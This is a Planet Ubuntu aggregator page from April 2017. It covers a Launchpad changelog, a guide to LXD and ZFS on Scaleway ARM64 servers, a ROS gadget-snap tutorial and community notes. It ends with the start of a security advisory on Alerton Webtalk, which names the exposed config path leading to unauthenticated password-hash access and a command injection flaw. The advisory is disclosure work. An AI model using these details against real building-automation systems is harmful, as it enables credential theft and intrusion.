April 28, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Launchpad News: Launchpad news, November 2015 – April 2017

Well, it’s been a while!  Since we last posted a general update, the Launchpad team has become part of Canonical’s Online Services department, so some of our efforts have gone into other projects.  There’s still plenty happening with Launchpad, though, and here’s a changelog-style summary of what we’ve been up to.


  • Lock down question title and description edits from random users
  • Prevent answer contacts from editing question titles and descriptions
  • Prevent answer contacts from editing FAQs


  • Optimise SpecificationSet.getStatusCountsForProductSeries, fixing Product:+series timeouts
  • Add sprint deletion support (#2888)
  • Restrict blueprint count on front page to public blueprints

Build farm

  • Add fallback if nominated architecture-independent architecture is unavailable for building (#1530217)
  • Try to load the nbd module when starting launchpad-buildd (#1531171)
  • Default LANG/LC_ALL to C.UTF-8 during binary package builds (#1552791)
  • Convert buildd-manager to use a connection pool rather than trying to download everything at once (#1584744)
  • Always decode build logtail as UTF-8 rather than guessing (#1585324)
  • Move non-virtualised builders to the bottom of /builders; Ubuntu is now mostly built on virtualised builders
  • Pass DEB_BUILD_OPTIONS=noautodbgsym during binary package builds if we have not been told to build debug symbols (#1623256)


  • Use standard milestone ordering for bug task milestone choices (#1512213)
  • Make bug activity records visible to anonymous API requests where appropriate (#991079)
  • Use a monospace font for “Add comment” boxes for bugs, to match how the comments will be displayed (#1366932)
  • Fix BugTaskSet.createManyTasks to map Incomplete to its storage values (#1576857)
  • Add basic GitHub bug linking (#848666)
  • Prevent rendering of private team names in bugs feed (#1592186)
  • Update CVE database XML namespace to match current file on cve.mitre.org
  • Fix Bugzilla bug watches to support new versions that permit multiple aliases
  • Sort bug tasks related to distribution series by series version rather than series name (#1681899)


  • Remove always-empty portlet from Person:+branches (#1511559)
  • Fix OOPS when editing a Git repository with over a thousand refs (#1511838)
  • Add Git links to DistributionSourcePackage:+branches and DistributionSourcePackage:+all-branches (#1511573)
  • Handle prerequisites in Git-based merge proposals (#1489839)
  • Fix OOPS when trying to register a Git merge with a target path but no target repository
  • Show an “Updating repository…” indication when there are pending writes
  • Launchpad’s Git hosting backend is now self-hosted
  • Fix setDefaultRepository(ForOwner) to cope with replacing an existing default (#1524316)
  • Add “Configure Code” link to Product:+git
  • Fix Git diff generation crash on non-ASCII conflicts (#1531051)
  • Fix stray link to +editsshkeys on Product:+configure-code when SSH keys were already registered (#1534159)
  • Add support for Git recipes (#1453022)
  • Fix OOPS when adding a comment to a Git-based merge proposal without using AJAX (#1536363)
  • Fix shallow git clones over HTTPS (#1547141)
  • Add new “Code” portlet on Product:+index to make it easier to find source code (#531323)
  • Add missing table around widget row on Product:+configure-code, so that errors are highlighted properly (#1552878)
  • Sort GitRepositorySet.getRepositories API results to make batching reliable (#1578205)
  • Show recent commits on GitRef:+index
  • Show associated merge proposals in Git commit listings
  • Show unmerged and conversation-relevant Git commits in merge proposal views (#1550118)
  • Implement AJAX revision diffs for Git
  • Fix scanning branches with ghost revisions in their ancestry (#1587948)
  • Fix decoding of Git diffs involving non-UTF-8 text that decodes to unpaired surrogates when treated as UTF-8 (#1589411)
  • Fix linkification of references to Git repositories (#1467975)
  • Fix +edit-status for Git merge proposals (#1538355)
  • Include username in git+ssh URLs (#1600055)
  • Allow linking bugs to Git-based merge proposals (#1492926)
  • Make Person.getMergeProposals have a constant query count on the webservice (#1619772)
  • Link to the default git repository on Product:+index (#1576494)
  • Add Git-to-Git code imports (#1469459)
  • Improve preloading of {Branch,GitRepository}.{landing_candidates,landing_targets}, fixing various timeouts
  • Export GitRepository.getRefByPath (#1654537)
  • Add GitRepository.rescan method, useful in cases when a scan crashed


  • Launchpad’s SSH endpoints (bazaar.launchpad.net, git.launchpad.net, upload.ubuntu.com, and ppa.launchpad.net) now support newer key exchange and MAC algorithms, allowing compatibility with OpenSSH >= 7.0 (#1445619)
  • Make cross-referencing code more efficient for large numbers of IDs (#1520281)
  • Canonicalise path encoding before checking a librarian TimeLimitedToken (#677270)
  • Fix Librarian to generate non-cachable 500s on missing storage files (#1529428)
  • Document the standard DELETE method in the apidoc (#753334)
  • Add a PLACEHOLDER account type for use by SSO-only accounts
  • Add support to +login for acquiring discharge macaroons from SSO via an OpenID exchange (#1572605)
  • Allow managing SSH keys in SSO
  • Re-raise unexpected HTTP errors when talking to the GPG key server
  • Ensure that the production dump is usable before destroying staging
  • Log SQL statements as Unicode to avoid confusing page rendering when the visible_render_time flag is on (#1617336)
  • Fix the librarian to fsync new files and their parent directories
  • Handle running Launchpad from a Git working tree
  • Handle running Launchpad on Ubuntu 16.04 (upgrade currently in progress)
  • Fix delete_unwanted_swift_files to not crash on segments (#1642411)
  • Update database schema for PostgreSQL 9.5 and 9.6
  • Check fingerprints of keys received from the keyserver rather than trusting it implicitly


  • Make public SSH key records visible to anonymous API requests (#1014996)
  • Don’t show unpublished packages or package names from private PPAs in search results from the package picker (#42298, #1574807)
  • Make Person.time_zone always be non-None, allowing us to easily show the edit widget even for users who have never set their time zone (#1568806)
  • Let latest questions, specifications and products be efficiently calculated
  • Let project drivers edit series and productreleases, as series drivers can; project drivers should have series driver power over all series
  • Fix misleading messages when joining a delegated team
  • Allow team privacy changes when referenced by CodeReviewVote.reviewer or BugNotificationRecipient.person
  • Don’t limit Person:+related-projects to a single batch


  • Add webhook support for snaps (#1535826)
  • Allow deleting snaps even if they have builds
  • Provide snap builds with a proxy so that they can access external network resources
  • Add support for automatically uploading snap builds to the store (#1572605)
  • Update latest snap builds table via AJAX
  • Add option to trigger snap builds when top-level branch changes (#1593359)
  • Add processor selection in new snap form
  • Add option to automatically release snap builds to store channels after upload (#1597819)
  • Allow manually uploading a completed snap build to the store
  • Upload *.manifest files from builders as well as *.snap (#1608432)
  • Send an email notification for general snap store upload failures (#1632299)
  • Allow building snaps from an external Git repository
  • Move upload to FAILED if its build was deleted (e.g. because of a deleted snap) (#1655334)
  • Consider snap/snapcraft.yaml and .snapcraft.yaml as well as snapcraft.yaml for new snaps (#1659085)
  • Add support for building snaps with classic confinement (#1650946)
  • Fix builds_for_snap to avoid iterating over an unsliced DecoratedResultSet (#1671134)
  • Add channel track support when uploading snap builds to the store (contributed by Matias Bordese; #1677644)

Soyuz (package management)

  • Remove some more uses of the confusing .dsc component; add the publishing component to SourcePackage:+index in compensation
  • Add include_meta option to SPPH.sourceFileUrls, paralleling BPPH.binaryFileUrls
  • Kill debdiff after ten minutes or 1GiB of output by default, and make sure we clean up after it properly (#314436)
  • Fix handling of << and >> dep-waits
  • Allow PPA admins to set external_dependencies on individual binary package builds (#671190)
  • Fix NascentUpload.do_reject to not send an erroneous Accepted email (#1530220)
  • Include DEP-11 metadata in Release file if it is present
  • Consistently generate Release entries for uncompressed versions of files, even if they don’t exist on the filesystem; don’t create uncompressed Packages/Sources files on the filesystem
  • Handle Build-Depends-Arch and Build-Conflicts-Arch from SPR.user_defined_fields in Sources generation and SP:+index (#1489044)
  • Make index compression types configurable per-series, and add xz support (#1517510)
  • Use SHA-512 digests for GPG signing where possible (#1556666)
  • Re-sign PPAs with SHA-512
  • Publish by-hash index files (#1430011)
  • Show SHA-256 checksums rather than MD5 on DistributionSourcePackageRelease:+files (#1562632)
  • Add a per-series switch allowing packages in supported components to build-depend on packages in unsupported components, used for Ubuntu 16.04 and later
  • Expand archive signing to kernel modules (contributed by Andy Whitcroft; #1577736)
  • Uniquely index PackageDiff(from_source, to_source) (part of #1475358)
  • Handle original tarball signatures in source packages (#1587667)
  • Add signed checksums for published UEFI/kmod files (contributed by Andy Whitcroft; #1285919)
  • Add support for named authentication tokens for private PPAs
  • Show explicit add-apt-repository command on Archive:+index (#1547343)
  • Use a per-archive OOPS timeline in archivepublisher scripts
  • Link to package versions on DSP:+index using fmt:url rather than just a relative link to the version, to avoid problems with epochs (#1629058)
  • Fix RepositoryIndexFile to gzip without timestamps
  • Fix Archive.getPublishedBinaries API call to have a constant query count (#1635126)
  • Include the package name in package copy job OOPS reports and emails (#1618133)
  • Remove headers from Contents files (#1638219)
  • Notify the Changed-By address for PPA uploads if the .changes contains “Launchpad-Notify-Changed-By: yes” (#1633608)
  • Accept .debs containing control.tar.xz (#1640280)
  • Add Archive.markSuiteDirty API call to allow requesting that a given archive/suite be published
  • Don’t allow cron-control to interrupt publish-ftpmaster part-way through (#1647478)
  • Optimise non-SQL time in PublishingSet.requestDeletion (#1682096)
  • Store uploaded .buildinfo files (#1657704)


  • Allow TranslationImportQueue to import entries from file objects rather than having to read arbitrarily-large files into memory (#674575)


  • Use gender-neutral pronouns where appropriate
  • Self-host the Ubuntu webfonts (#1521472)
  • Make the beta and privacy banners float over the rest of the page when scrolling
  • Upgrade to pytz 2016.4 (#1589111)
  • Publish Launchpad’s code revision in an X-Launchpad-Revision header
  • Truncate large picker search results rather than refusing to display anything (#893796)
  • Sync up the lists footer with the main webapp footer a bit (#1679093)

28 April, 2017 02:08PM

Simos Xenitellis: A closer look at the new ARM64 Scaleway servers and LXD

Scaleway has been offering ARM (armv7) cloud servers (baremetal) since 2015 and now they have ARM64 (armv8, from Cavium) cloud servers (through KVM, not baremetal).

But can you run LXD on them? Let’s see.

Launching a new server

We go through the management panel and select to create a new server. At the moment, only the Paris datacenter has availability of ARM64 servers and we select ARM64-2GB.

They use Cavium ThunderX hardware, and those boards have up to 48 cores. You can allocate either 2, 4, or 8 cores, for 2GB, 4GB, and 8GB RAM respectively. KVM is the virtualization platform.

There is an option of either Ubuntu 16.04 or Debian Jessie. We try Ubuntu.

It takes under a minute to provision and boot the server.

Connecting to the server

It runs Linux 4.9.23. Also, the disk is vda, specifically, /dev/vda. That is, there is no partitioning and the filesystem takes over the whole device.

Here is /proc/cpuinfo and uname -a. They are the two cores (from 48) as provided by KVM. The BogoMIPS are really Bogo on these platforms, so do not take them at face value.

Currently, Scaleway does not have their own mirror of the distribution packages but use ports.ubuntu.com. It’s 16ms away (ping time).

Depending on where you are, the ping times for google.com and www.google.com tend to be different. google.com redirects to www.google.com, so it somewhat makes sense that google.com reacts faster. At other locations (different country), could be the other way round.

This is /var/log/auth.log, and already there are some hackers trying to brute-force SSH. They have been trying with username ubnt. Note to self: do not use ubnt as the username for the non-root account.

The default configuration for the SSH server on Scaleway is to allow password authentication. You need to change this at /etc/ssh/sshd_config to look like

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

Originally, it was commented out, and had a default yes.

Finally, run

sudo systemctl reload sshd

This will not break your existing SSH session (even restart will not break your existing SSH session, how cool is that?). Now, you can create your non-root account. To get that user to sudo as root, you need to usermod -a -G sudo myusername.

There is a recovery console, accessible through the Web management screen. For this to work, it says that you first need to You must first login and set a password via SSH to use this serial console. In reality, the root account already has a password that has been set, and this password is stored in /root/.pw. It is not known how good this password is, therefore, when you boot a cloud server on Scaleway,

  1. Disable PasswordAuthentication for SSH as shown above and reload the sshd configuration. You are supposed to have already added your SSH public key in the Scaleway Web management screen BEFORE starting the cloud server.
  2. Change the root password so that it is not the one found at /root/.pw. Store somewhere safe that password, because it is needed if you want to connect through the recovery console
  3. Create a non-root user that can sudo and can do PubkeyAuthentication, preferably with username other than this ubnt.

Setting up ZFS support

The Ubuntu Linux kernels at Scaleway do not have ZFS support and you need to compile as a kernel module according to the instructions at https://github.com/scaleway/kernel-tools.

Actually, those instructions are apparently now obsolete with newer versions of the Linux kernel and you need to compile both spl and zfs manually, and install.

Naturally, when you compile spl and zfs, you can create .deb packages that can be installed in a nice and clean way. However, spl and zfs will originally create .rpm packages and then call alien to convert them to .deb packages. Then, we hit on some alien bug (no pun intended) which gives the error: zfs- is for architecture aarch64 ; the package cannot be built on this system which is weird since we are only working on aarch64.

The running Linux kernel on Scaleway for these ARM64 SoC has the following important files, http://mirror.scaleway.com/kernel/aarch64/4.9.23-std-1/

Therefore, run as root the following:

# Determine versions
arch="$(uname -m)"
release="$(uname -r)"

# Get kernel sources
mkdir -p /usr/src
wget -O "/usr/src/linux-${upstream}.tar.xz" "https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-${upstream}.tar.xz"
tar xf "/usr/src/linux-${upstream}.tar.xz" -C /usr/src/
ln -fns "/usr/src/linux-${upstream}" /usr/src/linux
ln -fns "/usr/src/linux-${upstream}" "/lib/modules/${release}/build"

# Get the kernel's .config and Module.symvers files
wget -O "/usr/src/linux/.config" "http://mirror.scaleway.com/kernel/${arch}/${release}/config"
wget -O /usr/src/linux/Module.symvers "http://mirror.scaleway.com/kernel/${arch}/${release}/Module.symvers"

# Set the LOCALVERSION to the locally running local version (or edit the file manually)
printf 'CONFIG_LOCALVERSION="%s"\n' "${local:+-$local}" >> /usr/src/linux/.config

# Let's get ready to compile. The following are essential for the kernel module compilation.
apt install -y build-essential
apt install -y libssl-dev
make -C /usr/src/linux prepare modules_prepare

# Now, let's grab the latest spl and zfs (see http://zfsonlinux.org/).
cd /usr/src/
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-

# Install some dev packages that are needed for spl and zfs,
apt install -y uuid-dev
apt install -y dh-autoreconf
# Let's do spl first
tar xvfa spl-
cd spl-
./configure      # Takes about 2 minutes
make             # Takes about 1:10 minutes
make install
cd ..

# Let's do zfs next
cd zfs-
tar xvfa zfs-
./configure      # Takes about 6:10 minutes
make             # Takes about 13:20 minutes
make install

# Let's get ZFS loaded
depmod -a
modprobe zfs
zfs list
zpool list

And that’s it! The last two commands will show that there are no datasets or pools available (yet), meaning that it all works.

Setting up LXD

We are going to use a file (with ZFS) as the storage file. Let’s check what space we have left for this (from the 50GB disk),

root@scw-ubuntu-arm64:~# df -h /
Filesystem      Size  Used Avail Use% Mounted on
/dev/vda         46G  2.0G   42G   5% /

Initially, it was only 800MB used, now it is 2GB used. Let’s allocate 30GB for LXD.

LXD is not already installed on the Scaleway image (other VPS providers have alread LXD installed). Therefore,

apt install lxd

Then, we can run lxd init. There is a weird situation when you run lxd init. It takes quite some time for this command to show the first questions (choose storage backend, etc). In fact, it takes 1:42 minutes before you are prompted for the first question. When you subsequently run lxd init, you get at once the first question. There is quite some work that lxd init does for the first time, and I did not look into what it is.

root@scw-ubuntu-arm64:~# lxd init
Name of the storage backend to use (dir or zfs) [default=zfs]: 
Create a new ZFS pool (yes/no) [default=yes]? 
Name of the new ZFS pool [default=lxd]: 
Would you like to use an existing block device (yes/no) [default=no]? 
Size in GB of the new loop device (1GB minimum) [default=15]: 30
Would you like LXD to be available over the network (yes/no) [default=no]? 
Do you want to configure the LXD bridge (yes/no) [default=yes]? 
Warning: Stopping lxd.service, but it can still be activated by:

LXD has been successfully configured.

Now, let’s run lxc list. This will create first the client certificate. There is quite a bit of cryptography going on, and it takes a lot of time.

ubuntu@scw-ubuntu-arm64:~$ time lxc list
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04


real    5m25.717s
user    5m25.460s
sys    0m0.372s

It is weird and warrants closer examination. In any case,

ubuntu@scw-ubuntu-arm64:~$ cat /proc/sys/kernel/random/entropy_avail

Creating containers

Let’s create a container. We are going to do each step at a time, in order to measure the time it takes to complete.

ubuntu@scw-ubuntu-arm64:~$ time lxc image copy ubuntu:x local:
Image copied successfully!         

real    1m5.151s
user    0m1.244s
sys    0m0.200s

Out of the 65 seconds, 25 seconds was the time to download the image and the rest (40 seconds) was for initialization before the prompt was returned.

Let’s see how long it takes to launch a container.

ubuntu@scw-ubuntu-arm64:~$ time lxc launch ubuntu:x c1
Creating c1
Starting c1
error: Error calling 'lxd forkstart c1 /var/lib/lxd/containers /var/log/lxd/c1/lxc.conf': err='exit status 1'
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
  lxc 20170428125239.730 ERROR lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
  lxc 20170428125239.730 ERROR lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
  lxc 20170428125240.408 ERROR lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
  lxc 20170428125240.408 ERROR lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".

Try `lxc info --show-log local:c1` for more info

real    0m21.347s
user    0m0.040s
sys    0m0.048s

What this means, is that somehow the Scaleway Linux kernel does not have all the AppArmor (“aa”) features that LXD requires. And if we want to continue, we must configure that we are OK with this situation.

What features are missing?

ubuntu@scw-ubuntu-arm64:~$ lxc info --show-log local:c1
Name: c1
Remote: unix:/var/lib/lxd/unix.socket
Architecture: aarch64
Created: 2017/04/28 12:52 UTC
Status: Stopped
Type: persistent
Profiles: default


            lxc 20170428125239.730 WARN     lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:218 - Incomplete AppArmor support in your kernel
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
            lxc 20170428125239.730 ERROR    lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
            lxc 20170428125239.730 ERROR    lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
            lxc 20170428125240.408 ERROR    lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
            lxc 20170428125240.408 ERROR    lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.


Two hints here, some issue with process_label_set, and get_cgroup.

Let’s allow for now, and start the container,

ubuntu@scw-ubuntu-arm64:~$ lxc config set c1 raw.lxc 'lxc.aa_allow_incomplete=1'
ubuntu@scw-ubuntu-arm64:~$ time lxc start c1

real    0m0.577s
user    0m0.016s
sys    0m0.012s
ubuntu@scw-ubuntu-arm64:~$ lxc list
| NAME |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
| c1   | RUNNING |      |      | PERSISTENT | 0         |
ubuntu@scw-ubuntu-arm64:~$ lxc list
| NAME |  STATE  |         IPV4          | IPV6 |    TYPE    | SNAPSHOTS |
| c1   | RUNNING | (eth0) |      | PERSISTENT | 0         |

Let’s run nginx in the container.

ubuntu@scw-ubuntu-arm64:~$ lxc exec c1 -- sudo --login --user ubuntu
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@c1:~$ sudo apt update
Hit:1 http://ports.ubuntu.com/ubuntu-ports xenial InRelease
37 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@c1:~$ sudo apt install nginx
ubuntu@c1:~$ exit
ubuntu@scw-ubuntu-arm64:~$ curl
<!DOCTYPE html>
<title>Welcome to nginx!</title>

That’s it! We are running LXD on Scaleway and their new ARM64 servers. The issues should be fixed in order to have a nicer user experience.

28 April, 2017 01:12PM

April 27, 2017

Costales: Ubuntu y otras hierbas S01E01 [videopodcast] [spanish]

En mi primer videopodcast el tema tiene miga: Ubuntu mata Unity y el móvil.

Enlace al videopodcast. Enlace al podcast (sólo audio).

27 April, 2017 09:04PM by Marcos Costales (noreply@blogger.com)

Xubuntu: Xubuntu Quality Assurance team is spreading out

Up until the start of the 17.04 cycle the Xubuntu Quality Assurance team had been led by one person. During the last cycle, a break was needed by that person. The recent addition of Dave Pearson to the team meant we were in a position to call on someone else to lead the team.

Today, we’re pleased to announce that Dave will be carrying on as a team lead. However, starting with the artfully named Artful Aardvark cycle, we will migrate to a Quality Assurance team with two leads who will be sharing duties during development cycles.

While Dave was in control of the show during 17.04, Kev was spending more time upstream with Xfce, involving himself in testing GTK3 ports with Simon. The QA team plans to continue this split roughly from this point; Dave will be running the daily Xubuntu QA and Kev will focus more on the QA for Xfce. For the most part it is unlikely that much change will be seen by most, given that for the most part we’re quiet during a cycle (QA team notes: even if the majority of -dev mailing list posts come from us…) – other than shouting when things need you all to join in.

While it is obvious to most that there are deep connections between Xubuntu and Xfce, we hope that this change will bring more targetted testing of the new GTK3 Xfce packages. You will start to see more calls for testing of packages before they reach Xubuntu on the Xubuntu development mailing list. Case in point, the recent requests for people to test Thunar and patches direct from the Xfce Git repositories – though up until now this has come via Launchpad bug reports.

On a positive note this change has solely been possible by the creation of the Xubuntu QA Launchpad team some cycles ago. Specifically set up to allow people from the community to be brought in to the Xubuntu setup and from there become members of the Xubuntu team itself. People do get noticed on the tracker and they do get noticed on our IRC channels. Our hope is that we are able to increase the numbers of people in Xubuntu QA from the few we currently have. Increasing numbers of people involved, help us increase the quality and strength of the team directly.

27 April, 2017 04:44PM

Ubuntu Insights: ROS production: obtaining confined access to the Turtlebot [4/5]

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the fourth blog post in this series about ROS production. In the previous post we created a snap of our prototype, and released it into the store. In this post, we’re going to work toward an Ubuntu Core image by creating what’s called a gadget snap. A gadget snap contains information such as the bootloader bits, filesystem layout, etc., and is specific to the piece of hardware running Ubuntu Core. We don’t need anything special in that regard (read that link if you do), but the gadget snap is also currently the only place on Ubuntu Core and snaps in general where we can specify our udev symlink rule in order to obtain confined access to our Turtlebot (i.e. allow our snap to be installable and workable without devmode). Eventually there will be a way to do this without requiring a custom gadget, but this is how it’s done today.

Alright, let’s get started. Remember that this is also a video series: feel free to watch the video version of this post:

Step 1: Start with an existing gadget

Canonical publishes gadget snaps for all reference devices, including generic amd64, i386, as well as the Raspberry Pi 2 and 3, and the DragonBoard 410c. If the computer on which you’re going to install Ubuntu Core is among these, you can start with a fork of the corresponding official gadget snap maintained in the github.com/snapcore organization. Since I’m using a NUC, I’ll start with a fork of pc-amd64-gadget (my finished gadget is available for reference, and here’s one for the DragonBoard). If you’re using a different reference device, fork that gadget and you can still follow the rest of these steps.

Step 2: Select a name for your gadget snap

Open the snapcraft.yaml included in your gadget snap fork. You’ll see the same metadata we discussed in the previous post. Since snap names are globally unique, you need to decide on a different name for your gadget. For example, I selected pc-turtlebot-kyrofa. Once you settle on one, register it:

$ snapcraft register my-gadget-snap-name

If the registration succeeded, change the snapcraft.yaml to reflect the new name. You can also update the summary, description, and version as necessary.

Step 3: Add the required udev rule

If you’ll recall, back in the second post in this series, we installed a udev rule to ensure that the Turtlebot showed up at /dev/kobuki. Take a look at that rule:

$ cat /etc/udev/rules.d/57-kobuki.rules
# On precise, for some reason, USER and GROUP are getting ignored.
# So setting mode = 0666 for now.
SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="kobuki*", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
# Bluetooth module (currently not supported and may have problems)
# SUBSYSTEM=="tty", ATTRS{address}=="00:00:00:41:48:22", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"

It’s outside the scope of this series to explain udev in depth, but the two values I’ve made bold are how the Kobuki base is uniquely identified. We’re going to write the snapd version of this rule, using the same values. At the end of the gadget’s snapcraft.yaml, add the following slot definition:

# Custom serial-port interface for the Turtlebot 2
    interface: serial-port
    path: /dev/serial-port-kobuki
    usb-vendor: 0x0403
    usb-product: 0x6001

The name of the slot being defined is kobuki. The symlink path we’re requesting is /dev/serial-port-kobuki. Why not /dev/kobuki? Because snapd only supports namespaced serial port symlinks to avoid conflicts. You can use whatever you like for this path (and the slot name), but make sure to follow the /dev/serial-port-<whatever> pattern, and adjust the rest of the directions in this series accordingly.

Step 4: Build the gadget snap

This step is easy. Just get into the gadget snap directory and run:

$ snapcraft

In the end, you’ll have a gadget snap.

Step 5: Put the gadget snap in the store

You don’t technically need the gadget snap in the store just to create an image, but there are two reasons you will want it there:

  1. Without putting it in the store you have no way of updating it in the future
  2. Without putting it in the store it’s impossible for the serial-port interface we just added to be automatically connected to the snap that needs it, which means the image won’t make the robot move out of the box

Since you’ve already registered the snap name, just push it up (we want our image based on the stable channel, so let’s release into that):

$ snapcraft push /path/to/my/gadget.snap --release=stable

You will in all likelihood receive an error saying it’s been queued for manual review since it’s a gadget snap. It’s true, right now gadget snaps require manual review (although that will change soon). You’ll need to wait for this review to complete successfully before you can take advantage of it actually being in the store (make a post in the store category of the forum if it takes longer than you expect), but you can continue following this series while you wait. I’ll highlight things you’ll need to do differently if your gadget snap isn’t yet available in the store.

Step 6: Adjust our ROS snap to run under strict confinement

As you’ll remember, our ROS snap currently only runs with devmode, and still assumes the Turtlebot is available at /dev/kobuki. We know now that our gadget snap will make the Turtlebot available via a slot at /dev/serial-port-kobuki, so we need to alter our snap slightly to account for this. Fortunately, when we initially created the prototype, we made the serial port configurable. Good call on that! Let’s edit our snapcraft.yaml a bit:

name: my-turtlebot-snap
version: '0.2'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

    interface: serial-port

    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Most of this is unchanged from version 0.1 of our snap that we discussed in the previous post. I’ve made the relevant sections bold; let’s cover them individually.

version: 0.2

We’re modifying the snap here, so I suggest changing the version. This isn’t required (the version field is only for human consumption, it’s not used to determine which snap is newest), but it certainly makes support easier (“what version of the snap are you on?”).

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

You wrote such a nice comment, it hardly needs more explanation. The point is, now that we have a gadget that makes this device accessible, we can switch to using strict confinement.

    interface: serial-port

This one defines a new plug in this snap, but then says “the kobuki plug is just a serial-port plug.” This is optional, but it’s handy to have our plug named kobuki instead of the more generic serial-port. If you opt to leave this off, keep it in mind for the following section.

    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Here we take advantage of the flexibility we introduced in the second post of the series, and specify that our launch file should be launched with device_port set to the udev symlink defined by the gadget instead of the default /dev/kobuki. We also specify that this app should utilize the kobuki plug defined directly above it, which grants it confined access to the serial port.

Rebuild your snap, and release the updated version into the store as we covered in part 3, but now you can release to the stable channel. Note that this isn’t required, but the reasons for putting this snap in the store are the same as the reasons for putting the gadget in the store (namely, updatability and interface auto-connection).

In the next (and final) post in this series, we’ll put all these pieces together and create an Ubuntu Core image that is ready for the factory.

27 April, 2017 02:33PM

Ubuntu Podcast from the UK LoCo: S10E08 – Rotten Hospitable Statement - Ubuntu Podcast

We discuss what is going on over at System76 with Emma Marshall, help protect your bits with some Virtual Private Love and go over your feedback.

It’s Season Ten Episode Eight of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

27 April, 2017 02:00PM

hackergotchi for ArcheOS


ArcheOS Hypatia and Archeorobotics: ROS for 3D dynamic documentations

Dynamic 3D documentation is a technique we are using more and more in professional archaeology. It can be useful to map in a very fast way any kind of earth-moving work during negative archaeological controls (from wide open area to small trenches, like we did here) or to record in real-time archaeological evidences and layers during a normal excavation (like the video below).

Using this methodology during an ordinary project allows us to perform the segmentation of the 3D model directly on the field (within the software Cloud Compare), dividing each layer of palimpsestic documentation (we spoke about this problem during our presentation at the CHNT conference 2016). This solution avoid long post-processing operations, and it is ideal to spare time and money in low-budget archaeological investigations. For this reason we are evaluating the possibility to insert ROS (Robot Operating System) in ArcheOS Hypatia.
I hope to give you soon good news about the release of the next version of ArcheOS. In the meantime stay tuned to follow our research in testing new Open Source and Free Software. Like always, if you want to help in the development, just contact us in one of our channels: FaceBook, YouTube or Blogger
Have a nice day! 

27 April, 2017 11:50AM by Luca Bezzi (noreply@blogger.com)

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Security Issues in Alerton Webtalk (Auth Bypass, RCE)


Vulnerabilities were identified in the Alerton Webtalk Software supplied by Alerton. This software is used for the management of building automation systems. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive. Alerton has responded that Webtalk is EOL and past the end of its support period. Customers should move to newer products available from Alerton. Thanks to Alerton for prompt replies in communicating with us about these issues.

Versions 2.5 and 3.3 were both confirmed to be affected by these issues.

(This blog post is a duplicate of the advisory I sent to the full-disclosure mailing list.)

Webtalk-01 - Password Hashes Accessible to Unauthenticated Users

Severity: High

Password hashes for all of the users configured in Alerton Webtalk are accessible via a file in the document root of the ‘webtalk’ user. The location of this file is configuration dependent, however the configuration file is accessible as well (at a static location, /~webtalk/webtalk.ini). The password database is a sqlite3 database whose name is based on the bacnet rep and job entries from the ini file.

A python proof of concept to reproduce this issue is in an appendix.

Recommendation: Do not store sensitive data within areas being served by the webserver.

Webtalk-02 - Command Injection for Authenticated Webtalk Users

Severity: High

